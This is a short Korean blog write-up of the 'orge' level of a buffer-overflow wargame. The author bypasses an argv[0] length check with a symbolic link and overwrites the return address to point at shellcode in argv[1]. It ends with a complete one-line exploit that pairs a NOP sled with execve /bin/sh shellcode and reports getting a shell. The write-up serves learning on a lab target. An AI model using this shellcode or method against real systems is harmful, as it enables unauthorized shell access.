orge, orge.c
이전 문제와 달라진 것을 보면 argv[0]의 길이가 77이 아니면 에러 출력하고 프로그램이 종료된다.
argc를 2이상으로 주어야하고 에그쉘을 사용하지 않고 RET는 bf로 시작하는 주소로 덮어야하고 argv[1]의 길이는 48이하로 주어야하고 버퍼가 40바이트 초기화 되므로 메인의 지역변수 버퍼에는 쉘코드를 넣지 말아야한다.
argv[0]은 명령어로 ./orgc argv1 하게되면 strlen(argv[0])은 6이 된다. 나는 argv[0]의 길이를 늘리기 위해서 심볼릭 링크를 사용하였다.
이렇게 심볼릭 링크를 걸어두면 새롭게 추가된 조건을 만족하여 전과 같은 방법으로 공격 할 수 있다.
페이로드는 바로 이전 문제와 똑같이 사용할 것이다.
[버퍼][SFP][RET]..........[argv[1]]
[ 쉘코드 ][RET]..........[쉘코드]
RET를 덮어 씌울 쉘코드가 올라갈 메모리를 찾아보자.
argv[0]을 AAAA...AAA로 잡았으니 헷갈리지 않게 argv[1]를 BBB......BB로 잡는다.
argv[0]에 A가 많이 들어가있고 argv[1]에 B가 많이 들어가있는것을 볼 수 있다.
위의 주소로 RET를 덮게하고 위의 조건들을 만족시키게 쉘코드 작성하고 공격을 시도해본다.
쉘을 얻을 수 있었다.
쉘코드 :
./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA `python -c 'print "\x90"*20 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\xca\xfb\xff\xbf"'`
0 개의 댓글:
댓글 쓰기